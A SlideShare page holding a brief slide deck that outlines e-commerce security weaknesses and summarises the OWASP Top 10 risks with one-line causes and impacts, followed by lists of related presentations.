SlideShare a Scribd company logo
“security@ecommerce”
Where We Are?
Recent Attacks on e-commerce sites shows the
vulnerability when the intruder was able to make
unauthorized calls to see and manipulate the data.
• Transaction system calls are open publicly.
• Some of Web API calls are still on HTTP.
• Same username/password are used across multiple
clients/channels.
• Most of internal applications are open publicly.
Top 10 OWASP Security
Guidelines
A1 Injection A2 Broken
Auth and
Session Mgmt
A3 Cross site
scripting -
XSS
A4 Insecure
Direct Object
References
A5 Security
Misconfigura
tion
A6 – Sensitive
Data
Exposure
A7 – Missing
Function
Level Access
Control
A8 – CSRF
A9 – Using
components
with known
vulnerabilities
A10 –
Unvalidated
Redirects and
Forwards
A1 - Injection
How ?
•
SQL Injection, LDAP query
Impact
•
Unintended commands are executed.
•
Data can be accessed without proper
authentication.
A2 – Broken Auth &
Session Mgmt.
How ?
•
Authentication and Session management not
implemented properly.
Impact
•
Assume user identities and gain access.
•
Get hold of password, token, session keys.
A3 – Cross Site Scripting
How ?
•
Application takes un-trusted data and sends it
to a web browser without proper validation or
escaping.
Impact
•
Hijack user sessions.
•
Redirect users to malicious sites.
A4 – Insecure Direct
Object References
How ?
•
Developer exposes references to files, XML
objects, DB keys.
Impact
•
Attackers can manipulate these references to
access unauthorized data.
A5 – Security
Misconfiguration
How ?
•
Web Servers and DB servers do not
implement adequate security policies
Impact
•
Unable to trace the origin of a command.
•
Cannot have good control to
A6 – Security Data
ExposureHow ?
•
Hashing and Encryption techniques not
adequate while storing Payment info such as
passwords, CC etc ..
•
Payment info transmitted over plain text.
Impact
•
Intruder can get access to Payment info and
there by cause brand damage.
A7 – Missing Function
Level Access Control
How ?
•
Function level access absent on the server at
the time of request.
•
Attackers forge request.
Impact
•
Unauthorized access.
A8 – Cross Site Request
Forgery
How ?
•
Authentication tokens or cookies are used to
forge HTTP requests from victims browser.
Impact
•
The forged requests come as legitimate and
there by compromising the application.
A9 – Components With
Vulnerabilities
How ?
•
Frameworks and components run on full
privileges.
Impact
•
Any issue on these will in turn cause issues on
the main application.
A10 – Unvalidated
Requests and Forwards
How ?
•
No validation in place while redirecting to
other pages and applications.
Impact
•
Phishing attacks will redirect to applications
through which sensitive information can be
captured.
Next Steps...
Proactive approach.
Its Better to beef-up rather than repent on later.
Security should be constantly reviewed and
during code reviews emphasis needs to provided.
Security@ecommerce

More Related Content

What's hot

E-Commerce Security: A Primer
E-Commerce Security: A PrimerE-Commerce Security: A Primer
E-Commerce Security: A Primer
John ILIADIS
 
e commerce security and fraud protection
e commerce security and fraud protectione commerce security and fraud protection
e commerce security and fraud protection
tumetr1
 
Privacy and Security Issues in E-Commerce
Privacy and Security Issues in E-Commerce  Privacy and Security Issues in E-Commerce
Privacy and Security Issues in E-Commerce
Titas Ahmed
 
Security in E-commerce
Security in E-commerceSecurity in E-commerce
Security in E-commerce
m8817
 
6 e commerce security
6 e commerce security6 e commerce security
6 e commerce security
Naveed Ahmed Siddiqui
 
Security environment
Security environmentSecurity environment
Security environment
Jay Choudhary
 
Security issues in e business
Security issues in e businessSecurity issues in e business
Security issues in e business
Rahul Kumar
 
E-Commerce Chap 5: E-COMMERCE SECURITY AND PAYMENT SYSTEMS (D3 B 2018)
E-Commerce Chap 5: E-COMMERCE SECURITY AND PAYMENT SYSTEMS (D3 B 2018)E-Commerce Chap 5: E-COMMERCE SECURITY AND PAYMENT SYSTEMS (D3 B 2018)
E-Commerce Chap 5: E-COMMERCE SECURITY AND PAYMENT SYSTEMS (D3 B 2018)
Shandy Aditya
 
04-1 E-commerce Security slides
04-1 E-commerce Security slides04-1 E-commerce Security slides
04-1 E-commerce Security slides
monchai sopitka
 
E-Commerce security
E-Commerce security E-Commerce security
E-Commerce security
Tawhid Rahman
 
E-Banking Web Security
E-Banking Web SecurityE-Banking Web Security
E-Banking Web Security
Dragos Lungu
 
Web security for e-commerce
Web security for e-commerceWeb security for e-commerce
Web security for e-commerce
Nishant Pahad
 
Introduction to Information Security
Introduction to Information SecurityIntroduction to Information Security
Introduction to Information Security
Dumindu Pahalawatta
 
Security issue in e commerce
Security issue in e commerceSecurity issue in e commerce
Threats of E-Commerce in Database
Threats of E-Commerce in DatabaseThreats of E-Commerce in Database
Threats of E-Commerce in Database
Mentalist Akram
 
Security In Internet Banking
Security In Internet BankingSecurity In Internet Banking
Security In Internet Banking
Chiheb Chebbi
 
Banking and Modern Payments System Security Analysis
Banking and Modern Payments System Security AnalysisBanking and Modern Payments System Security Analysis
Banking and Modern Payments System Security Analysis
CSCJournals
 
Securing Your Remote Access Desktop Connection
Securing Your Remote Access Desktop ConnectionSecuring Your Remote Access Desktop Connection
Securing Your Remote Access Desktop Connection
SecurityMetrics
 
E-commerce Security
E-commerce SecurityE-commerce Security
E-commerce Security
Lindsey Landolfi
 
How Can I Reduce The Risk Of A Cyber-Attack?
How Can I Reduce The Risk Of A Cyber-Attack?How Can I Reduce The Risk Of A Cyber-Attack?
How Can I Reduce The Risk Of A Cyber-Attack?
Osei Fortune
 

What's hot (20)

E-Commerce Security: A Primer
E-Commerce Security: A PrimerE-Commerce Security: A Primer
E-Commerce Security: A Primer
 
e commerce security and fraud protection
e commerce security and fraud protectione commerce security and fraud protection
e commerce security and fraud protection
 
Privacy and Security Issues in E-Commerce
Privacy and Security Issues in E-Commerce  Privacy and Security Issues in E-Commerce
Privacy and Security Issues in E-Commerce
 
Security in E-commerce
Security in E-commerceSecurity in E-commerce
Security in E-commerce
 
6 e commerce security
6 e commerce security6 e commerce security
6 e commerce security
 
Security environment
Security environmentSecurity environment
Security environment
 
Security issues in e business
Security issues in e businessSecurity issues in e business
Security issues in e business
 
E-Commerce Chap 5: E-COMMERCE SECURITY AND PAYMENT SYSTEMS (D3 B 2018)
E-Commerce Chap 5: E-COMMERCE SECURITY AND PAYMENT SYSTEMS (D3 B 2018)E-Commerce Chap 5: E-COMMERCE SECURITY AND PAYMENT SYSTEMS (D3 B 2018)
E-Commerce Chap 5: E-COMMERCE SECURITY AND PAYMENT SYSTEMS (D3 B 2018)
 
04-1 E-commerce Security slides
04-1 E-commerce Security slides04-1 E-commerce Security slides
04-1 E-commerce Security slides
 
E-Commerce security
E-Commerce security E-Commerce security
E-Commerce security
 
E-Banking Web Security
E-Banking Web SecurityE-Banking Web Security
E-Banking Web Security
 
Web security for e-commerce
Web security for e-commerceWeb security for e-commerce
Web security for e-commerce
 
Introduction to Information Security
Introduction to Information SecurityIntroduction to Information Security
Introduction to Information Security
 
Security issue in e commerce
Security issue in e commerceSecurity issue in e commerce
Security issue in e commerce
 
Threats of E-Commerce in Database
Threats of E-Commerce in DatabaseThreats of E-Commerce in Database
Threats of E-Commerce in Database
 
Security In Internet Banking
Security In Internet BankingSecurity In Internet Banking
Security In Internet Banking
 
Banking and Modern Payments System Security Analysis
Banking and Modern Payments System Security AnalysisBanking and Modern Payments System Security Analysis
Banking and Modern Payments System Security Analysis
 
Securing Your Remote Access Desktop Connection
Securing Your Remote Access Desktop ConnectionSecuring Your Remote Access Desktop Connection
Securing Your Remote Access Desktop Connection
 
E-commerce Security
E-commerce SecurityE-commerce Security
E-commerce Security
 
How Can I Reduce The Risk Of A Cyber-Attack?
How Can I Reduce The Risk Of A Cyber-Attack?How Can I Reduce The Risk Of A Cyber-Attack?
How Can I Reduce The Risk Of A Cyber-Attack?
 

Viewers also liked

opening keynote on the state of eCommerce
opening keynote on the state of eCommerceopening keynote on the state of eCommerce
opening keynote on the state of eCommerce
webhostingguy
 
Andry startupasia
Andry startupasiaAndry startupasia
Andry startupasia
vkk91
 
Top 5 Digital Trends
Top 5 Digital TrendsTop 5 Digital Trends
Top 5 Digital Trends
MarynWilliams
 
Nightingale_Security__Company_Profile_Digital_Brochure_Desktop_071916
Nightingale_Security__Company_Profile_Digital_Brochure_Desktop_071916Nightingale_Security__Company_Profile_Digital_Brochure_Desktop_071916
Nightingale_Security__Company_Profile_Digital_Brochure_Desktop_071916
Pierre Ketels
 
Growth Hack - Jakarta Series
Growth Hack - Jakarta SeriesGrowth Hack - Jakarta Series
Growth Hack - Jakarta Series
imran2017
 
Basics of Digital Marketing 2014
Basics of Digital Marketing 2014Basics of Digital Marketing 2014
Basics of Digital Marketing 2014
Sara Talal
 
כנס חווית לקוח מצגת פתיחה
כנס חווית לקוח   מצגת פתיחהכנס חווית לקוח   מצגת פתיחה
כנס חווית לקוח מצגת פתיחה
Avi Assis
 
DSS - ITSEC conf - Arcot - Security for eCommerce - Riga Nov2011
DSS - ITSEC conf - Arcot - Security for eCommerce - Riga Nov2011DSS - ITSEC conf - Arcot - Security for eCommerce - Riga Nov2011
DSS - ITSEC conf - Arcot - Security for eCommerce - Riga Nov2011
Andris Soroka
 
Browser Extensions in Mozilla Firefox & Google Chrome
Browser Extensions in Mozilla Firefox & Google ChromeBrowser Extensions in Mozilla Firefox & Google Chrome
Browser Extensions in Mozilla Firefox & Google Chrome
Kenneth Auchenberg
 
Cyber Crimes
Cyber CrimesCyber Crimes
Cyber Crimes
little robie
 
AnyID and Privacy
AnyID and PrivacyAnyID and Privacy
AnyID and Privacy
Narudom Roongsiriwong, CISSP
 
Web Browsers
Web BrowsersWeb Browsers
Web Browsers
Adolfo Vasconez
 
Eamonn O Raghallaigh The Major Security Issues In E Commerce
Eamonn O Raghallaigh   The Major Security Issues In E CommerceEamonn O Raghallaigh   The Major Security Issues In E Commerce
Eamonn O Raghallaigh The Major Security Issues In E Commerce
EamonnORagh
 
Cyber fraud a threat to E commerce
Cyber fraud a threat to E commerceCyber fraud a threat to E commerce
Cyber fraud a threat to E commerce
Sudeshna07
 
FT Partners Research: Transaction Security - At the Nexus of E-Commerce, Paym...
FT Partners Research: Transaction Security - At the Nexus of E-Commerce, Paym...FT Partners Research: Transaction Security - At the Nexus of E-Commerce, Paym...
FT Partners Research: Transaction Security - At the Nexus of E-Commerce, Paym...
FT Partners / Financial Technology Partners
 
Marketing Plan Bisnis PayTren - Treni Ustadz Yusuf Mansur 2016
Marketing Plan Bisnis PayTren - Treni Ustadz Yusuf Mansur 2016Marketing Plan Bisnis PayTren - Treni Ustadz Yusuf Mansur 2016
Marketing Plan Bisnis PayTren - Treni Ustadz Yusuf Mansur 2016
Andri Wiyasa
 
Secure electronic transaction (set)
Secure electronic transaction (set)Secure electronic transaction (set)
Secure electronic transaction (set)
Agnė Chomentauskaitė
 
Understanding IIS
Understanding IISUnderstanding IIS
Understanding IIS
Om Vikram Thapa
 
Mobile in Banking and Finance - What Make Sense and What Not
Mobile in Banking and Finance - What Make Sense and What NotMobile in Banking and Finance - What Make Sense and What Not
Mobile in Banking and Finance - What Make Sense and What Not
r4b
 
Security for e commerce
Security for e commerceSecurity for e commerce
Security for e commerce
Mohsin Ahmad
 

Viewers also liked (20)

opening keynote on the state of eCommerce
opening keynote on the state of eCommerceopening keynote on the state of eCommerce
opening keynote on the state of eCommerce
 
Andry startupasia
Andry startupasiaAndry startupasia
Andry startupasia
 
Top 5 Digital Trends
Top 5 Digital TrendsTop 5 Digital Trends
Top 5 Digital Trends
 
Nightingale_Security__Company_Profile_Digital_Brochure_Desktop_071916
Nightingale_Security__Company_Profile_Digital_Brochure_Desktop_071916Nightingale_Security__Company_Profile_Digital_Brochure_Desktop_071916
Nightingale_Security__Company_Profile_Digital_Brochure_Desktop_071916
 
Growth Hack - Jakarta Series
Growth Hack - Jakarta SeriesGrowth Hack - Jakarta Series
Growth Hack - Jakarta Series
 
Basics of Digital Marketing 2014
Basics of Digital Marketing 2014Basics of Digital Marketing 2014
Basics of Digital Marketing 2014
 
כנס חווית לקוח מצגת פתיחה
כנס חווית לקוח   מצגת פתיחהכנס חווית לקוח   מצגת פתיחה
כנס חווית לקוח מצגת פתיחה
 
DSS - ITSEC conf - Arcot - Security for eCommerce - Riga Nov2011
DSS - ITSEC conf - Arcot - Security for eCommerce - Riga Nov2011DSS - ITSEC conf - Arcot - Security for eCommerce - Riga Nov2011
DSS - ITSEC conf - Arcot - Security for eCommerce - Riga Nov2011
 
Browser Extensions in Mozilla Firefox & Google Chrome
Browser Extensions in Mozilla Firefox & Google ChromeBrowser Extensions in Mozilla Firefox & Google Chrome
Browser Extensions in Mozilla Firefox & Google Chrome
 
Cyber Crimes
Cyber CrimesCyber Crimes
Cyber Crimes
 
AnyID and Privacy
AnyID and PrivacyAnyID and Privacy
AnyID and Privacy
 
Web Browsers
Web BrowsersWeb Browsers
Web Browsers
 
Eamonn O Raghallaigh The Major Security Issues In E Commerce
Eamonn O Raghallaigh   The Major Security Issues In E CommerceEamonn O Raghallaigh   The Major Security Issues In E Commerce
Eamonn O Raghallaigh The Major Security Issues In E Commerce
 
Cyber fraud a threat to E commerce
Cyber fraud a threat to E commerceCyber fraud a threat to E commerce
Cyber fraud a threat to E commerce
 
FT Partners Research: Transaction Security - At the Nexus of E-Commerce, Paym...
FT Partners Research: Transaction Security - At the Nexus of E-Commerce, Paym...FT Partners Research: Transaction Security - At the Nexus of E-Commerce, Paym...
FT Partners Research: Transaction Security - At the Nexus of E-Commerce, Paym...
 
Marketing Plan Bisnis PayTren - Treni Ustadz Yusuf Mansur 2016
Marketing Plan Bisnis PayTren - Treni Ustadz Yusuf Mansur 2016Marketing Plan Bisnis PayTren - Treni Ustadz Yusuf Mansur 2016
Marketing Plan Bisnis PayTren - Treni Ustadz Yusuf Mansur 2016
 
Secure electronic transaction (set)
Secure electronic transaction (set)Secure electronic transaction (set)
Secure electronic transaction (set)
 
Understanding IIS
Understanding IISUnderstanding IIS
Understanding IIS
 
Mobile in Banking and Finance - What Make Sense and What Not
Mobile in Banking and Finance - What Make Sense and What NotMobile in Banking and Finance - What Make Sense and What Not
Mobile in Banking and Finance - What Make Sense and What Not
 
Security for e commerce
Security for e commerceSecurity for e commerce
Security for e commerce
 

Similar to Security@ecommerce

Top 10 web application security risks akash mahajan
Top 10 web application security risks   akash mahajanTop 10 web application security risks   akash mahajan
Top 10 web application security risks akash mahajan
Akash Mahajan
 
Security testautomation
Security testautomationSecurity testautomation
Security testautomation
Linkesh Kanna Velu
 
OWASP Top Ten in Practice
OWASP Top Ten in PracticeOWASP Top Ten in Practice
OWASP Top Ten in Practice
Security Innovation
 
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense MechanismsCh 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Sam Bowne
 
How to Test for The OWASP Top Ten
 How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
Security Innovation
 
Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHP
jikbal
 
How to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteHow to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET Website
DNN
 
Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application Security
Prateek Jain
 
CNIT 129S: Securing Web Applications Ch 1-2
CNIT 129S: Securing Web Applications Ch 1-2CNIT 129S: Securing Web Applications Ch 1-2
CNIT 129S: Securing Web Applications Ch 1-2
Sam Bowne
 
OWASP Evening #10 Serbia
OWASP Evening #10 SerbiaOWASP Evening #10 Serbia
OWASP Evening #10 Serbia
Predrag Cujanović
 
OWASP Evening #10
OWASP Evening #10OWASP Evening #10
OWASP Evening #10
Predrag Cujanović
 
Security workshop - Lets get our hands dirty!!
Security workshop - Lets get our hands dirty!!Security workshop - Lets get our hands dirty!!
Security workshop - Lets get our hands dirty!!
Manjyot Singh
 
Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacks
Frank Victory
 
Web Security
Web SecurityWeb Security
Web Security
Ali Habeeb
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World
42Crunch
 
Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities   2013Owasp top 10 vulnerabilities   2013
Owasp top 10 vulnerabilities 2013
Vishrut Sharma
 
Web security uploadv1
Web security uploadv1Web security uploadv1
Web security uploadv1
Setia Juli Irzal Ismail
 
Secure Coding BSSN Semarang Material.pdf
Secure Coding BSSN Semarang Material.pdfSecure Coding BSSN Semarang Material.pdf
Secure Coding BSSN Semarang Material.pdf
nanangAris1
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
Marco Morana
 
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013 Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Lostar
 

Similar to Security@ecommerce (20)

Top 10 web application security risks akash mahajan
Top 10 web application security risks   akash mahajanTop 10 web application security risks   akash mahajan
Top 10 web application security risks akash mahajan
 
Security testautomation
Security testautomationSecurity testautomation
Security testautomation
 
OWASP Top Ten in Practice
OWASP Top Ten in PracticeOWASP Top Ten in Practice
OWASP Top Ten in Practice
 
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense MechanismsCh 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
Ch 1: Web Application (In)security & Ch 2: Core Defense Mechanisms
 
How to Test for The OWASP Top Ten
 How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHP
 
How to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteHow to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET Website
 
Web and Mobile Application Security
Web and Mobile Application SecurityWeb and Mobile Application Security
Web and Mobile Application Security
 
CNIT 129S: Securing Web Applications Ch 1-2
CNIT 129S: Securing Web Applications Ch 1-2CNIT 129S: Securing Web Applications Ch 1-2
CNIT 129S: Securing Web Applications Ch 1-2
 
OWASP Evening #10 Serbia
OWASP Evening #10 SerbiaOWASP Evening #10 Serbia
OWASP Evening #10 Serbia
 
OWASP Evening #10
OWASP Evening #10OWASP Evening #10
OWASP Evening #10
 
Security workshop - Lets get our hands dirty!!
Security workshop - Lets get our hands dirty!!Security workshop - Lets get our hands dirty!!
Security workshop - Lets get our hands dirty!!
 
Lesson 6 web based attacks
Lesson 6 web based attacksLesson 6 web based attacks
Lesson 6 web based attacks
 
Web Security
Web SecurityWeb Security
Web Security
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World
 
Owasp top 10 vulnerabilities 2013
Owasp top 10 vulnerabilities   2013Owasp top 10 vulnerabilities   2013
Owasp top 10 vulnerabilities 2013
 
Web security uploadv1
Web security uploadv1Web security uploadv1
Web security uploadv1
 
Secure Coding BSSN Semarang Material.pdf
Secure Coding BSSN Semarang Material.pdfSecure Coding BSSN Semarang Material.pdf
Secure Coding BSSN Semarang Material.pdf
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
 
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013 Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
 

More from Om Vikram Thapa

Next Set of Leaders Series
Next Set of Leaders SeriesNext Set of Leaders Series
Next Set of Leaders Series
Om Vikram Thapa
 
Integration Testing at go-mmt
Integration Testing at go-mmtIntegration Testing at go-mmt
Integration Testing at go-mmt
Om Vikram Thapa
 
Understanding payments
Understanding paymentsUnderstanding payments
Understanding payments
Om Vikram Thapa
 
System Alerting & Monitoring
System Alerting & MonitoringSystem Alerting & Monitoring
System Alerting & Monitoring
Om Vikram Thapa
 
Serverless computing
Serverless computingServerless computing
Serverless computing
Om Vikram Thapa
 
Sumologic Community
Sumologic CommunitySumologic Community
Sumologic Community
Om Vikram Thapa
 
Postman Integration Testing
Postman Integration TestingPostman Integration Testing
Postman Integration Testing
Om Vikram Thapa
 
Scalibility
ScalibilityScalibility
Scalibility
Om Vikram Thapa
 
5 Dysfunctions of a team
5 Dysfunctions of a team5 Dysfunctions of a team
5 Dysfunctions of a team
Om Vikram Thapa
 
AWS Must Know
AWS Must KnowAWS Must Know
AWS Must Know
Om Vikram Thapa
 
Continuous Feedback
Continuous FeedbackContinuous Feedback
Continuous Feedback
Om Vikram Thapa
 
Sql views, stored procedure, functions
Sql views, stored procedure, functionsSql views, stored procedure, functions
Sql views, stored procedure, functions
Om Vikram Thapa
 
Confluence + jira together
Confluence + jira togetherConfluence + jira together
Confluence + jira together
Om Vikram Thapa
 
Understanding WhatFix
Understanding WhatFixUnderstanding WhatFix
Understanding WhatFix
Om Vikram Thapa
 
Tech Recruitment Process
Tech Recruitment Process Tech Recruitment Process
Tech Recruitment Process
Om Vikram Thapa
 
Jira Workshop
Jira WorkshopJira Workshop
Jira Workshop
Om Vikram Thapa
 
Understanding iis part2
Understanding iis part2Understanding iis part2
Understanding iis part2
Om Vikram Thapa
 
Understanding iis part1
Understanding iis part1Understanding iis part1
Understanding iis part1
Om Vikram Thapa
 
.Net framework
.Net framework.Net framework
.Net framework
Om Vikram Thapa
 
Web application
Web applicationWeb application
Web application
Om Vikram Thapa
 

More from Om Vikram Thapa (20)

Next Set of Leaders Series
Next Set of Leaders SeriesNext Set of Leaders Series
Next Set of Leaders Series
 
Integration Testing at go-mmt
Integration Testing at go-mmtIntegration Testing at go-mmt
Integration Testing at go-mmt
 
Understanding payments
Understanding paymentsUnderstanding payments
Understanding payments
 
System Alerting & Monitoring
System Alerting & MonitoringSystem Alerting & Monitoring
System Alerting & Monitoring
 
Serverless computing
Serverless computingServerless computing
Serverless computing
 
Sumologic Community
Sumologic CommunitySumologic Community
Sumologic Community
 
Postman Integration Testing
Postman Integration TestingPostman Integration Testing
Postman Integration Testing
 
Scalibility
ScalibilityScalibility
Scalibility
 
5 Dysfunctions of a team
5 Dysfunctions of a team5 Dysfunctions of a team
5 Dysfunctions of a team
 
AWS Must Know
AWS Must KnowAWS Must Know
AWS Must Know
 
Continuous Feedback
Continuous FeedbackContinuous Feedback
Continuous Feedback
 
Sql views, stored procedure, functions
Sql views, stored procedure, functionsSql views, stored procedure, functions
Sql views, stored procedure, functions
 
Confluence + jira together
Confluence + jira togetherConfluence + jira together
Confluence + jira together
 
Understanding WhatFix
Understanding WhatFixUnderstanding WhatFix
Understanding WhatFix
 
Tech Recruitment Process
Tech Recruitment Process Tech Recruitment Process
Tech Recruitment Process
 
Jira Workshop
Jira WorkshopJira Workshop
Jira Workshop
 
Understanding iis part2
Understanding iis part2Understanding iis part2
Understanding iis part2
 
Understanding iis part1
Understanding iis part1Understanding iis part1
Understanding iis part1
 
.Net framework
.Net framework.Net framework
.Net framework
 
Web application
Web applicationWeb application
Web application
 

Recently uploaded

Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-EfficiencyFreshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
ScyllaDB
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
Neo4j
 
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeckPoznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
FilipTomaszewski5
 
Apps Break Data
Apps Break DataApps Break Data
Apps Break Data
Ivo Velitchkov
 
JavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green MasterplanJavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green Masterplan
Miro Wengner
 
Must Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during MigrationMust Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during Migration
Mydbops
 
Essentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation ParametersEssentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation Parameters
Safe Software
 
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
Alex Pruden
 
What is an RPA CoE? Session 1 – CoE Vision
What is an RPA CoE?  Session 1 – CoE VisionWhat is an RPA CoE?  Session 1 – CoE Vision
What is an RPA CoE? Session 1 – CoE Vision
DianaGray10
 
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsConnector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
DianaGray10
 
A Deep Dive into ScyllaDB's Architecture
A Deep Dive into ScyllaDB's ArchitectureA Deep Dive into ScyllaDB's Architecture
A Deep Dive into ScyllaDB's Architecture
ScyllaDB
 
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfHow to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
Chart Kalyan
 
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
Fwdays
 
Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS  at Code Europe 2024Introduction of Cybersecurity with OSS  at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024
Hiroshi SHIBATA
 
Biomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Biomedical Knowledge Graphs for Data Scientists and BioinformaticiansBiomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Biomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Neo4j
 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
AstuteBusiness
 
Christine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptxChristine's Supplier Sourcing Presentaion.pptx
Christine's Supplier Sourcing Presentaion.pptx
christinelarrosa
 
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
DanBrown980551
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
LizaNolte
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
c5vrf27qcz
 

Recently uploaded (20)

Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-EfficiencyFreshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
 
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeckPoznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
 
Apps Break Data
Apps Break DataApps Break Data
Apps Break Data
 
JavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green MasterplanJavaLand 2024: Application Development Green Masterplan
JavaLand 2024: Application Development Green Masterplan
 
Must Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during MigrationMust Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during Migration
 
Essentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation ParametersEssentials of Automations: Exploring Attributes & Automation Parameters
Essentials of Automations: Exploring Attributes & Automation Parameters
 
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
 
What is an RPA CoE? Session 1 – CoE Vision
